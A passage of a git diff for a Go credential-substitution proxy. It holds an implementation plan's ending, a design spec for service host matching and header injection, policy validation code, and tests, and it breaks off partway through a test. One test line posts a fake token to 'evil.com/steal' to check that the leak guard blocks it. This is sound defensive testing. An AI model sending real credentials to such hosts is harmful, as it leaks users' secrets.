+	err = leakGuard.PreHook(leakReq, &proxy.RequestContext{ServiceName: "github"})
+	if err != nil {
+		t.Errorf("LeakGuard should skip matched service: %v", err)
+	}
+
+	// Verify leak guard blocks unmatched host.
+	leakReq2 := httptest.NewRequest(http.MethodPost, "http://evil.com/steal",
+		bytes.NewReader([]byte(fmt.Sprintf(`{"t":"%s"}`, fake))))
+	err = leakGuard.PreHook(leakReq2, &proxy.RequestContext{})
+	if err == nil {
+		t.Error("LeakGuard should block fakes to unmatched hosts")
+	}
+}
+```
+
+Add the necessary imports (`"github.com/agentsh/agentsh/internal/proxy/services"` and `"net/http/httptest"`) if not already present.
+
+- [ ] **Step 2: Run the integration test**
+
+Run: `go test ./internal/session/ -v -run TestIntegration_PolicyYAML_FullFlow`
+Expected: PASS
+
+- [ ] **Step 3: Run full test suite with race detector**
+
+Run: `go test ./... -race -count=1`
+Expected: PASS
+
+Run: `GOOS=windows go build ./...`
+Expected: clean
+
+- [ ] **Step 4: Commit**
+
+```bash
+git add internal/session/secrets_integration_test.go
+git commit -m "test(session): end-to-end integration test for policy-driven service config"
+```
+
+---
+
+## Self-Review Checklist
+
+### 1. Spec coverage
+
+| Spec section | Task |
+|---|---|
+| S1 — YAML Config Model (providers, services types) | Task 3 |
+| S2 — Policy Validation | Task 3 |
+| S3 — ServiceMatcher | Task 1 |
+| S4 — Header Injection (RealForService, HeaderInjectionHook, extended CredsSubHook) | Tasks 2, 4, 5 |
+| S5 — Proxy Integration (matcher field, SetMatcher, ServiceName in ServeHTTP) | Task 7 |
+| S5 — LeakGuardHook service-awareness | Task 6 |
+| S6 — Bootstrap Flow (resolver, updated StartLLMProxy) | Task 8 |
+| S7 — Testing (all test categories) | Tasks 1-9 |
+| S8 — File Layout | All tasks match |
+
+### 2. Placeholder scan
+
+No "TBD", "TODO", "implement later", "add validation", or similar. Every code step has complete code.
+
+### 3. Type consistency
+
+- `ServicePattern` — defined in Task 1, used in Tasks 7, 8, 9
+- `RealForService` — defined in Task 2, used in Tasks 4, 9
+- `ServiceYAML` — defined in Task 3, used in Tasks 8
+- `HeaderInjectionHook` / `NewHeaderInjectionHook` — defined in Task 4, used in Tasks 8, 9
+- `ResolvedServices` / `ResolveServiceConfigs` / `ResolveProviderConfigs` — defined in Task 8, used in Task 8
+- `InjectHeaderConfig` — defined in Task 8, used in Task 8
+- `ValidateSecrets` — defined in Task 3, called in Task 3 (wired into Validate)

--- a/docs/superpowers/specs/2026-04-09-plan-06-service-config-routing-design.md
+++ b/docs/superpowers/specs/2026-04-09-plan-06-service-config-routing-design.md
@@ -1,0 +1,424 @@
+# Plan 6: Service Config & Host Routing — Design
+
+**Date:** 2026-04-09
+**Status:** Design (pre-implementation)
+**Parent spec:** `docs/superpowers/specs/2026-04-07-external-secrets-design.md` (Sections 2, 3, 5, 7)
+**Depends on:** Plans 1-5 (proxy rename, credsub.Table, SecretProvider + keyring, Vault + registry, session proxy wiring)
+
+## Problem
+
+Plans 1-5 built the credential substitution infrastructure: credsub.Table, Hook interface + Registry, CredsSubHook, LeakGuardHook, fakegen, SecretProvider (keyring + Vault), provider Registry with topo sort, and BootstrapCredentials. But it is all hard-wired — the production caller passes `nil, nil` for secrets, hooks are registered globally (service name `""`), and there is no host matching or YAML configuration.
+
+Plan 6 connects this infrastructure to real per-service configuration: operators declare providers and services in policy YAML, the proxy matches requests to services by host pattern, and per-service hooks inject real credentials into outbound headers.
+
+## Goal
+
+Parse `providers:` and `services:` from policy YAML. Match inbound proxy requests to services by host pattern. Inject real credentials into outbound request headers per service. Extend fake-to-real substitution to cover headers, URL query, and URL path (not just body).
+
+## Architecture
+
+**ServiceMatcher** resolves `Host` header to a service name via literal + wildcard patterns. The existing hook Registry already dispatches hooks by service name. A new **HeaderInjectionHook** is registered per service to set the `Authorization` (or other) header using the real credential from a template. The **bootstrap flow** reads policy YAML, constructs providers, fetches secrets, generates fakes, populates the table, builds the matcher, and registers per-service hooks.
+
+## Scope
+
+**In scope:**
+- `providers:` YAML parsing (keyring, vault; extensible to future providers)
+- `services:` YAML parsing (name, match.hosts, secret.ref, fake.format, inject.header)
+- Policy validation for both sections
+- ServiceMatcher with literal + wildcard host matching
+- HeaderInjectionHook for per-service header injection
+- Table.RealForService method
+- CredsSubHook extended to substitute in headers, URL query, and URL path
+- Updated bootstrap flow: policy YAML to live proxy
+- Updated production caller (nil,nil to real config)
+
+**Parsed but not wired (forward compatibility):**
+- `inject.env` (env var injection — wired in a later plan)
+- `scrub_response` (response scrubbing config)
+- `hooks` (LLM-specific hook names like `dlp`, `mcp_intercept`)
+
+**Out of scope:**
+- Go Service plugin interface (AWS SigV4, GCP OAuth)
+- Cross-service detection (`secret_cross_service_use`)
+- SSE streaming substitution
+- Additional providers (AWS SM, GCP SM, Azure KV, 1Password)
+- `process_contexts[].secrets` scoping
+
+---
+
+## Section 1 — YAML Config Model
+
+Two new optional top-level keys in the Policy struct (`internal/policy/model.go`):
+
+```go
+Providers map[string]yaml.Node `yaml:"providers,omitempty"`
+Services  []ServiceYAML        `yaml:"services,omitempty"`
+```
+
+### Provider YAML
+
+Each provider entry has a `type` field plus type-specific fields. The policy model stores entries as `yaml.Node` to defer type-specific parsing to the secrets package (vault needs address/namespace/auth; keyring needs nothing).
+
+```yaml
+providers:
+  keyring:
+    type: keyring
+  vault:
+    type: vault
+    address: https://vault.corp.internal
+    namespace: engineering
+    auth:
+      method: token
+      token_ref: keyring://agentsh/vault_token
+```
+
+A resolver function decodes each `yaml.Node` into the appropriate `ProviderConfig` based on `type`:
+
+```go
+func resolveProviderConfig(name string, node yaml.Node) (secrets.ProviderConfig, error)
+```
+
+This switches on `type` and decodes into `keyring.Config`, `vault.Config`, etc.
+
+### Service YAML
+
+Services are an ordered list. Declaration order determines first-match-wins precedence for overlapping host patterns.
+
+```go
+type ServiceYAML struct {
+    Name          string               `yaml:"name"`
+    Match         ServiceMatchYAML     `yaml:"match"`
+    Secret        ServiceSecretYAML    `yaml:"secret"`
+    Fake          ServiceFakeYAML      `yaml:"fake"`
+    Inject        ServiceInjectYAML    `yaml:"inject,omitempty"`
+    ScrubResponse bool                 `yaml:"scrub_response,omitempty"`
+    Hooks         []string             `yaml:"hooks,omitempty"`
+}
+
+type ServiceMatchYAML struct {
+    Hosts []string `yaml:"hosts"`
+}
+
+type ServiceSecretYAML struct {
+    Ref       string `yaml:"ref"`
+    OnMissing string `yaml:"on_missing,omitempty"` // "fail" (default); "skip" and "fake_only" reserved for future plans
+}
+
+type ServiceFakeYAML struct {
+    Format string `yaml:"format"`
+}
+
+type ServiceInjectYAML struct {
+    Header *ServiceInjectHeaderYAML `yaml:"header,omitempty"`
+    Env    []ServiceInjectEnvYAML   `yaml:"env,omitempty"`
+}
+
+type ServiceInjectHeaderYAML struct {
+    Name     string `yaml:"name"`
+    Template string `yaml:"template"` // e.g. "Bearer {{secret}}"
+}
+
+type ServiceInjectEnvYAML struct {
+    Name string `yaml:"name"`
+}
+```
+
+Example:
+
+```yaml
+services:
+  - name: github
+    match:
+      hosts: ["api.github.com", "*.github.com"]
+    secret:
+      ref: vault://kv/data/github#token
+      on_missing: fail
+    fake:
+      format: "ghp_{rand:36}"
+    inject:
+      header:
+        name: Authorization
+        template: "Bearer {{secret}}"
+
+  - name: anthropic
+    match:
+      hosts: ["api.anthropic.com"]
+    secret:
+      ref: keyring://agentsh/anthropic_key
+      on_missing: fail
+    fake:
+      format: "sk-ant-{rand:93}"
+    inject:
+      header:
+        name: x-api-key
+        template: "{{secret}}"
+```
+
+---
+
+## Section 2 — Policy Validation
+
+All validation runs at parse time, before any providers are constructed or secrets fetched. Failures are fatal — session creation aborts with a structured error.
+
+### Provider validation
+
+- Every provider must have a non-empty `type` matching a known scheme (keyring, vault; extensible)
+- Duplicate provider names rejected
+- Auth-chaining refs (e.g. `token_ref: keyring://...`) must reference a declared provider's scheme
+- Circular auth-chaining detected by `secrets.NewRegistry`'s topological sort (existing behavior)
+
+### Service validation
+
+- Duplicate service names rejected
+- `match.hosts` must be non-empty; each pattern is either a literal hostname or `*.suffix`
+- `secret.ref` must parse as a valid `secrets.SecretRef` (via `secrets.ParseRef`) whose scheme maps to a declared provider
+- `fake.format` validated by `fakegen.ParseFormat` (must have `{rand:N}` with N >= 24)
+- If `inject.header` is present, `template` must contain `{{secret}}` placeholder
+- `on_missing` defaults to `"fail"` if omitted; Plan 6 only accepts `"fail"` — other values (`"skip"`, `"fake_only"`) rejected at parse time until implemented in a later plan
+- Overlapping host patterns across services produce a **warning** (not a hard error) with both service names — first-match-wins is intentional
+
+### Backward compatibility
+
+Existing policies without `providers:` or `services:` continue working. Both fields are `omitempty`. When absent, no credential substitution is configured and the proxy behaves exactly as it does today.
+
+---
+
+## Section 3 — ServiceMatcher
+
+New type in `internal/proxy/services/matcher.go`. Pure function — no state, no I/O, no dependencies on proxy or hooks.
+
+### Host pattern matching
+
+- **Literal:** exact match, case-insensitive (`api.github.com` matches `API.GitHub.com`)
+- **Wildcard:** `*.example.com` matches `api.example.com` but NOT `example.com` and NOT `sub.api.example.com` (single-level wildcard only)
+- **Port stripping:** `api.github.com:443` strips port before matching
+- **First-match-wins:** declaration order in YAML determines precedence
+
+### API
+
+```go
+type ServicePattern struct {
+    Name  string
+    Hosts []string // literal hostnames or "*.suffix" wildcards
+}
+
+type Matcher struct {
+    // pre-compiled patterns, ordered
+}
+
+func NewMatcher(services []ServicePattern) *Matcher
+func (m *Matcher) Match(host string) (serviceName string, ok bool)
+```
+
+The constructor pre-compiles wildcard patterns into suffix checks. `Match` is read-only and safe for concurrent use.
+
+---
+
+## Section 4 — Header Injection
+
+### Real-credential access
+
+The Table's API avoids exposing Real bytes (ContainsFake returns only the service name). But `inject.header` fundamentally needs the real credential to set `Authorization: Bearer <real>`. This is safe because:
+
+- The hook is internal proxy code, not agent-facing
+- Real bytes are used transiently within a single request and zeroed after use
+- The hook does not store real bytes persistently
+
+New method on `credsub.Table`:
+
+```go
+func (t *Table) RealForService(serviceName string) ([]byte, bool)
+```
+
+Returns a deep copy. Callers must zero the returned slice when done. Documented as internal proxy use only.
+
+### HeaderInjectionHook
+
+```go
+type HeaderInjectionHook struct {
+    serviceName string
+    headerName  string   // e.g. "Authorization"
+    template    string   // e.g. "Bearer {{secret}}"
+    table       *credsub.Table
+}
+
+func NewHeaderInjectionHook(serviceName, headerName, template string, table *credsub.Table) *HeaderInjectionHook
+```
+
+**PreHook behavior:**
+1. Look up real credential via `table.RealForService(serviceName)`
+2. Strip any existing value the agent set for this header (`req.Header.Del`)
+3. Build value: `strings.Replace(template, "{{secret}}", string(real), 1)`
+4. Set header: `req.Header.Set(headerName, value)`
+5. Zero the temporary real-credential copy
+
+**PostHook:** no-op.
+
+**Registration:** Per service name, so it only fires for matched requests. Runs after CredsSubHook (body substitution happens first, then header is set from scratch).
+
+### Extended CredsSubHook substitution
+
+Plan 5's CredsSubHook substitutes fakes in the request body only. The parent design spec (Section 6 step 4) calls for substitution in headers, URL query, and URL path as well.
+
+Plan 6 extends CredsSubHook.PreHook to also call `table.ReplaceFakeToReal` on:
+- Each header value (iterate `r.Header`, replace values in place)
+- `r.URL.RawQuery`
+- `r.URL.Path` and `r.URL.RawPath`
+
+This handles cases where an SDK puts the fake credential in a query parameter or path segment.
+
+---
+
+## Section 5 — Proxy Integration
+
+### New field and method
+
+The Proxy struct gets a `matcher *services.Matcher` field:
+
+```go
+func (p *Proxy) SetMatcher(m *services.Matcher) // thread-safe setter
+```
+
+Called after bootstrap completes. No getter needed — matcher is internal.
+
+### ServeHTTP changes
+
+Early in ServeHTTP, after reading the Host header:
+
+```go
+serviceName := ""
+if p.matcher != nil {
+    if name, ok := p.matcher.Match(r.Host); ok {
+        serviceName = name
+    }
+}
+reqCtx.ServiceName = serviceName
+```
+
+The existing hook dispatch calls `registry.ApplyPreHooks(serviceName, req, ctx)` — global hooks run first (service name `""`), then service-scoped hooks. No change to the Registry needed.
+
+### Hook registration strategy
+
+| Hook | Registration | Rationale |
+|------|-------------|-----------|
+| LeakGuardHook | Global (`""`) | Must scan ALL requests — but skips matched services (see below) |
+| CredsSubHook | Global (`""`) | Table-wide substitution covers all known fakes |
+| HeaderInjectionHook | Per service name | Only injects header for the matched service |
+
+**LeakGuardHook service-awareness (Plan 6 change).** In Plan 5, LeakGuardHook blocks any request containing a known fake. This was safe because the table was empty (production caller passed nil,nil). In Plan 6, the table is populated — agents are expected to send fakes to matched services. LeakGuardHook must now check `RequestContext.ServiceName`: if non-empty (host matched a service), skip the scan. If empty (unmatched host), scan for fakes and block with 403 if found. Cross-service detection (service-A fake in service-B request) is out of scope for Plan 6.
+
+**Ordering for a matched request:** LeakGuardHook (global, skips because service matched) -> CredsSubHook (global, body + headers + query + path) -> HeaderInjectionHook (per-service, sets header from scratch). Header injection runs last so it overwrites whatever CredsSubHook did to the same header.
+
+For unmatched hosts (`serviceName = ""`): only global hooks fire. LeakGuardHook scans for fakes and blocks if found. CredsSubHook still runs (harmless — no fakes in unmatched requests unless leak attempted).
+
+---
+
+## Section 6 — Bootstrap Flow
+
+End-to-end wiring from policy YAML to a running proxy with per-service hooks.
+
+### Resolver layer
+
+New `internal/session/secretsconfig.go` bridges policy YAML types to the existing secrets infrastructure:
+
+1. **Parse:** Policy loader deserializes `providers:` and `services:` into YAML types (Section 1).
+2. **Resolve providers:** For each provider entry, decode the `yaml.Node` into the appropriate `ProviderConfig` based on `type`. Build `map[string]ProviderConfig` for `secrets.NewRegistry`.
+3. **Resolve services:** For each service entry, build a `session.ServiceConfig` (Name, SecretRef, FakeFormat) for `BootstrapCredentials`. Also extract host patterns for ServiceMatcher and inject.header config for HeaderInjectionHook.
+4. **Construct provider registry:** `secrets.NewRegistry(ctx, configs, constructors)` — topo sort, auth chaining (existing Plan 4 code).
+5. **Bootstrap credentials:** `BootstrapCredentials(ctx, registry.Fetch, serviceConfigs)` — fetch secrets, generate fakes, populate table (existing Plan 5 code).
+6. **Build matcher:** `services.NewMatcher(patterns)` from service host patterns.
+7. **Register hooks:** LeakGuardHook + CredsSubHook globally (same as Plan 5). For each service with `inject.header`, register `HeaderInjectionHook` under the service name.
+8. **Wire proxy:** `proxy.SetMatcher(matcher)`.
+
+### StartLLMProxy signature change
+
+Currently takes `secretsFetcher SecretFetcher, services []ServiceConfig` (Plan 5). Plan 6 changes this to accept the parsed policy provider/service YAML, since the resolver translates YAML to configs internally. The production caller in `app.go` passes the policy's providers/services sections instead of `nil, nil`.
+
+### Failure semantics
+
+Unchanged from Plan 5. Any step failing aborts session creation. Agent never starts with partial config. Already-constructed providers are closed on failure (existing Registry behavior).
+
+---
+
+## Section 7 — Testing
+
+### ServiceMatcher tests
+
+- Literal match, case-insensitive
+- Wildcard `*.example.com` matches `api.example.com`, rejects `example.com` and `sub.api.example.com`
+- Port stripping (`host:443` matches `host` pattern)
+- First-match-wins with overlapping patterns
+- No match returns `"", false`
+- Empty matcher (no services) — everything unmatched
+
+### HeaderInjectionHook tests
+
+- Template substitution (`Bearer {{secret}}` produces correct header value)
+- Strips existing header before setting
+- No-op when service not in table
+- Zeros temporary credential copy
+- PostHook is no-op
+
+### Table.RealForService tests
+
+- Returns deep copy (mutating returned slice does not affect table)
+- Returns false for unknown service
+- Returns empty after Zero()
+
+### CredsSubHook extended substitution tests
+
+- Fake in header value replaced with real
+- Fake in URL query replaced
+- Fake in URL path replaced
+- Multiple fakes across surfaces all replaced
+- Body substitution unchanged (existing tests still pass)
+
+### Policy YAML parsing tests
+
+- Valid config: keyring + vault providers, two services, all fields populated
+- Unknown provider type rejected
+- Service referencing undeclared provider scheme rejected
+- Duplicate service names rejected
+- Invalid fake.format rejected
+- Missing `{{secret}}` in inject.header.template rejected
+- Overlapping hosts produce warning (not error)
+- Empty providers/services sections: backward compatible with existing policies
+- on_missing defaults to "fail" when omitted
+- Invalid on_missing value rejected
+
+### Integration test
+
+End-to-end: parse policy YAML with test-double providers, bootstrap credentials, construct matcher and hooks, send HTTP request to proxy with matching host, verify:
+- Host matched to correct service
+- Body fakes replaced with reals
+- Header injected with real credential from template
+- Response body reals replaced with fakes
+
+---
+
+## Section 8 — File Layout
+
+### New files
+
+| File | Responsibility |
+|------|---------------|
+| `internal/proxy/services/matcher.go` | ServiceMatcher, host pattern matching |
+| `internal/proxy/services/matcher_test.go` | Matcher unit tests |
+| `internal/policy/secrets.go` | ProviderYAML, ServiceYAML types, validation functions |
+| `internal/policy/secrets_test.go` | YAML parsing and validation tests |
+| `internal/session/secretsconfig.go` | Resolver: YAML to ProviderConfig + ServiceConfig, wiring logic |
+| `internal/session/secretsconfig_test.go` | Resolver tests |
+
+### Modified files
+
+| File | Change |
+|------|--------|
+| `internal/policy/model.go` | Add `Providers` and `Services` fields to Policy struct |
+| `internal/proxy/credsub/table.go` | Add `RealForService` method |
+| `internal/proxy/credsub/table_test.go` | RealForService tests |
+| `internal/proxy/credshook.go` | Add HeaderInjectionHook; extend CredsSubHook for headers/query/path |
+| `internal/proxy/credshook_test.go` | HeaderInjectionHook tests, extended substitution tests |
+| `internal/session/llmproxy.go` | Updated bootstrap flow, accepts policy config |
+| `internal/session/llmproxy_test.go` | Updated call sites |
+| `internal/proxy/proxy.go` | Add matcher field, SetMatcher, use matcher in ServeHTTP |
+| `internal/api/app.go` | Pass policy providers/services to StartLLMProxy |

--- a/internal/policy/model.go
+++ b/internal/policy/model.go
@@ -2,6 +2,7 @@ package policy
 
 import (
 	"fmt"
+	"log/slog"
 	"net"
 	"regexp"
 	"time"
@@ -41,6 +42,11 @@ type Policy struct {
 
 	// Transparent command overrides (add/remove from built-in defaults)
 	TransparentCommands *TransparentCommandsConfig `yaml:"transparent_commands,omitempty"`
+
+	// External secrets: provider definitions and service declarations.
+	// Parsed from YAML but validated by ValidateSecrets in secrets.go.
+	Providers map[string]yaml.Node `yaml:"providers,omitempty"`
+	Services  []ServiceYAML        `yaml:"services,omitempty"`
 }
 
 type FileRule struct {
@@ -501,6 +507,15 @@ func (p Policy) Validate() error {
 		}
 		if r.OnFailure != "" && r.OnFailure != "fail_closed" && r.OnFailure != "fail_open" && r.OnFailure != "retry_original" {
 			return fmt.Errorf("connect_redirects[%d]: on_failure must be fail_closed, fail_open, or retry_original", i)
+		}
+	}
+
+	// Validate external secrets config.
+	if warnings, err := ValidateSecrets(p.Providers, p.Services); err != nil {
+		return fmt.Errorf("secrets: %w", err)
+	} else {
+		for _, w := range warnings {
+			slog.Warn("policy validation", "warning", w)
 		}
 	}
 

--- a/internal/policy/secrets.go
+++ b/internal/policy/secrets.go
@@ -1,0 +1,177 @@
+// internal/policy/secrets.go
+package policy
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/agentsh/agentsh/internal/proxy/secrets"
+	"gopkg.in/yaml.v3"
+)
+
+// ServiceYAML represents a service declaration in policy YAML.
+type ServiceYAML struct {
+	Name          string            `yaml:"name"`
+	Match         ServiceMatchYAML  `yaml:"match"`
+	Secret        ServiceSecretYAML `yaml:"secret"`
+	Fake          ServiceFakeYAML   `yaml:"fake"`
+	Inject        ServiceInjectYAML `yaml:"inject,omitempty"`
+	ScrubResponse bool              `yaml:"scrub_response,omitempty"`
+	Hooks         []string          `yaml:"hooks,omitempty"`
+}
+
+// ServiceMatchYAML defines which hosts a service matches.
+type ServiceMatchYAML struct {
+	Hosts []string `yaml:"hosts"`
+}
+
+// ServiceSecretYAML defines how to fetch the real credential.
+type ServiceSecretYAML struct {
+	Ref       string `yaml:"ref"`
+	OnMissing string `yaml:"on_missing,omitempty"`
+}
+
+// ServiceFakeYAML defines how to generate the fake credential.
+type ServiceFakeYAML struct {
+	Format string `yaml:"format"`
+}
+
+// ServiceInjectYAML defines how the credential is injected.
+type ServiceInjectYAML struct {
+	Header *ServiceInjectHeaderYAML `yaml:"header,omitempty"`
+	Env    []ServiceInjectEnvYAML   `yaml:"env,omitempty"`
+}
+
+// ServiceInjectHeaderYAML defines header injection config.
+type ServiceInjectHeaderYAML struct {
+	Name     string `yaml:"name"`
+	Template string `yaml:"template"`
+}
+
+// ServiceInjectEnvYAML defines env var injection config (parsed, not wired in Plan 6).
+type ServiceInjectEnvYAML struct {
+	Name string `yaml:"name"`
+}
+
+// knownProviderTypes lists the provider type names (URI schemes) that
+// Plan 6 supports. Extended as new providers land.
+var knownProviderTypes = map[string]bool{
+	"keyring": true,
+	"vault":   true,
+}
+
+// ValidateSecrets validates the providers and services sections of a Policy.
+// It checks structural rules only -- provider constructability and secret
+// existence are validated at bootstrap time.
+func ValidateSecrets(providers map[string]yaml.Node, services []ServiceYAML) (warnings []string, err error) {
+	// Collect declared provider schemes for cross-referencing.
+	providerSchemes := make(map[string]string) // scheme -> provider name
+	for name, node := range providers {
+		ptype, typeErr := extractProviderType(node)
+		if typeErr != nil {
+			return nil, fmt.Errorf("providers.%s: %w", name, typeErr)
+		}
+		if !knownProviderTypes[ptype] {
+			return nil, fmt.Errorf("providers.%s: unknown type %q", name, ptype)
+		}
+		if prev, dup := providerSchemes[ptype]; dup {
+			return nil, fmt.Errorf("providers.%s: duplicate type %q (already declared by %q)", name, ptype, prev)
+		}
+		providerSchemes[ptype] = name
+	}
+
+	// Validate services.
+	seen := make(map[string]bool)
+	hostOwner := make(map[string]string) // host pattern -> first service name (for overlap warnings)
+	for i, svc := range services {
+		if svc.Name == "" {
+			return nil, fmt.Errorf("services[%d]: name is required", i)
+		}
+		if seen[svc.Name] {
+			return nil, fmt.Errorf("services[%d]: duplicate service name %q", i, svc.Name)
+		}
+		seen[svc.Name] = true
+
+		// match.hosts
+		if len(svc.Match.Hosts) == 0 {
+			return nil, fmt.Errorf("services[%d] %q: match.hosts must not be empty", i, svc.Name)
+		}
+		for _, h := range svc.Match.Hosts {
+			if err := validateHostPattern(h); err != nil {
+				return nil, fmt.Errorf("services[%d] %q: match.hosts: %w", i, svc.Name, err)
+			}
+			if prev, overlap := hostOwner[strings.ToLower(h)]; overlap {
+				warnings = append(warnings, fmt.Sprintf(
+					"services: host pattern %q in %q overlaps with %q (first match wins)", h, svc.Name, prev))
+			}
+			hostOwner[strings.ToLower(h)] = svc.Name
+		}
+
+		// secret.ref -- must parse and reference a declared provider
+		ref, parseErr := secrets.ParseRef(svc.Secret.Ref)
+		if parseErr != nil {
+			return nil, fmt.Errorf("services[%d] %q: secret.ref: %w", i, svc.Name, parseErr)
+		}
+		if _, ok := providerSchemes[ref.Scheme]; !ok {
+			return nil, fmt.Errorf("services[%d] %q: secret.ref scheme %q has no matching provider", i, svc.Name, ref.Scheme)
+		}
+
+		// fake.format
+		if _, _, fmtErr := secrets.ParseFormat(svc.Fake.Format); fmtErr != nil {
+			return nil, fmt.Errorf("services[%d] %q: fake.format: %w", i, svc.Name, fmtErr)
+		}
+
+		// on_missing
+		switch svc.Secret.OnMissing {
+		case "", "fail":
+			// ok
+		default:
+			return nil, fmt.Errorf("services[%d] %q: on_missing %q not supported (only \"fail\" in Plan 6)", i, svc.Name, svc.Secret.OnMissing)
+		}
+
+		// inject.header.template
+		if svc.Inject.Header != nil {
+			if svc.Inject.Header.Name == "" {
+				return nil, fmt.Errorf("services[%d] %q: inject.header.name is required", i, svc.Name)
+			}
+			if !strings.Contains(svc.Inject.Header.Template, "{{secret}}") {
+				return nil, fmt.Errorf("services[%d] %q: inject.header.template must contain {{secret}}", i, svc.Name)
+			}
+		}
+	}
+
+	return warnings, nil
+}
+
+// extractProviderType decodes just the "type" field from a provider yaml.Node.
+func extractProviderType(node yaml.Node) (string, error) {
+	var base struct {
+		Type string `yaml:"type"`
+	}
+	if err := node.Decode(&base); err != nil {
+		return "", fmt.Errorf("decode type: %w", err)
+	}
+	if base.Type == "" {
+		return "", fmt.Errorf("type is required")
+	}
+	return base.Type, nil
+}
+
+// validateHostPattern checks that a host pattern is a valid literal or
+// a single-level wildcard ("*.example.com").
+func validateHostPattern(pattern string) error {
+	if pattern == "" {
+		return fmt.Errorf("empty host pattern")
+	}
+	if strings.HasPrefix(pattern, "*.") {
+		suffix := pattern[2:]
+		if suffix == "" || strings.Contains(suffix, "*") {
+			return fmt.Errorf("invalid wildcard pattern %q", pattern)
+		}
+		return nil
+	}
+	if strings.Contains(pattern, "*") {
+		return fmt.Errorf("wildcard must be at start: %q", pattern)
+	}
+	return nil
+}

--- a/internal/policy/secrets_test.go
+++ b/internal/policy/secrets_test.go
@@ -1,0 +1,186 @@
+package policy
+
+import (
+	"strings"
+	"testing"
+
+	"gopkg.in/yaml.v3"
+)
+
+func mustNode(t *testing.T, yamlStr string) yaml.Node {
+	t.Helper()
+	var node yaml.Node
+	if err := yaml.Unmarshal([]byte(yamlStr), &node); err != nil {
+		t.Fatal(err)
+	}
+	// yaml.Unmarshal wraps in a document node; return the content.
+	if node.Kind == yaml.DocumentNode && len(node.Content) > 0 {
+		return *node.Content[0]
+	}
+	return node
+}
+
+func TestValidateSecrets_Valid(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+		"vault":   mustNode(t, "type: vault\naddress: https://vault.example.com\nauth:\n  method: token\n  token: test"),
+	}
+	services := []ServiceYAML{
+		{
+			Name:   "github",
+			Match:  ServiceMatchYAML{Hosts: []string{"api.github.com", "*.github.com"}},
+			Secret: ServiceSecretYAML{Ref: "vault://kv/data/github#token"},
+			Fake:   ServiceFakeYAML{Format: "ghp_{rand:36}"},
+			Inject: ServiceInjectYAML{Header: &ServiceInjectHeaderYAML{
+				Name: "Authorization", Template: "Bearer {{secret}}",
+			}},
+		},
+		{
+			Name:   "anthropic",
+			Match:  ServiceMatchYAML{Hosts: []string{"api.anthropic.com"}},
+			Secret: ServiceSecretYAML{Ref: "keyring://agentsh/anthropic_key"},
+			Fake:   ServiceFakeYAML{Format: "sk-ant-{rand:93}"},
+			Inject: ServiceInjectYAML{Header: &ServiceInjectHeaderYAML{
+				Name: "x-api-key", Template: "{{secret}}",
+			}},
+		},
+	}
+
+	warnings, err := ValidateSecrets(providers, services)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(warnings) != 0 {
+		t.Errorf("unexpected warnings: %v", warnings)
+	}
+}
+
+func TestValidateSecrets_UnknownProviderType(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"foo": mustNode(t, "type: unknown"),
+	}
+	_, err := ValidateSecrets(providers, nil)
+	if err == nil || !strings.Contains(err.Error(), "unknown type") {
+		t.Errorf("expected unknown type error, got: %v", err)
+	}
+}
+
+func TestValidateSecrets_DuplicateServiceName(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{Name: "github", Match: ServiceMatchYAML{Hosts: []string{"a.com"}}, Secret: ServiceSecretYAML{Ref: "keyring://a/b"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+		{Name: "github", Match: ServiceMatchYAML{Hosts: []string{"b.com"}}, Secret: ServiceSecretYAML{Ref: "keyring://a/c"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+	}
+	_, err := ValidateSecrets(providers, services)
+	if err == nil || !strings.Contains(err.Error(), "duplicate service name") {
+		t.Errorf("expected duplicate error, got: %v", err)
+	}
+}
+
+func TestValidateSecrets_InvalidFakeFormat(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{Name: "bad", Match: ServiceMatchYAML{Hosts: []string{"a.com"}}, Secret: ServiceSecretYAML{Ref: "keyring://a/b"}, Fake: ServiceFakeYAML{Format: "no-rand-here"}},
+	}
+	_, err := ValidateSecrets(providers, services)
+	if err == nil || !strings.Contains(err.Error(), "fake.format") {
+		t.Errorf("expected fake.format error, got: %v", err)
+	}
+}
+
+func TestValidateSecrets_MissingSecretTemplate(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{
+			Name: "bad", Match: ServiceMatchYAML{Hosts: []string{"a.com"}},
+			Secret: ServiceSecretYAML{Ref: "keyring://a/b"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"},
+			Inject: ServiceInjectYAML{Header: &ServiceInjectHeaderYAML{Name: "Auth", Template: "Bearer no-placeholder"}},
+		},
+	}
+	_, err := ValidateSecrets(providers, services)
+	if err == nil || !strings.Contains(err.Error(), "{{secret}}") {
+		t.Errorf("expected template error, got: %v", err)
+	}
+}
+
+func TestValidateSecrets_UndeclaredProviderScheme(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{Name: "bad", Match: ServiceMatchYAML{Hosts: []string{"a.com"}}, Secret: ServiceSecretYAML{Ref: "vault://kv/data/x#y"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+	}
+	_, err := ValidateSecrets(providers, services)
+	if err == nil || !strings.Contains(err.Error(), "no matching provider") {
+		t.Errorf("expected no matching provider error, got: %v", err)
+	}
+}
+
+func TestValidateSecrets_InvalidOnMissing(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{Name: "bad", Match: ServiceMatchYAML{Hosts: []string{"a.com"}}, Secret: ServiceSecretYAML{Ref: "keyring://a/b", OnMissing: "skip"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+	}
+	_, err := ValidateSecrets(providers, services)
+	if err == nil || !strings.Contains(err.Error(), "not supported") {
+		t.Errorf("expected on_missing error, got: %v", err)
+	}
+}
+
+func TestValidateSecrets_OverlappingHosts_Warning(t *testing.T) {
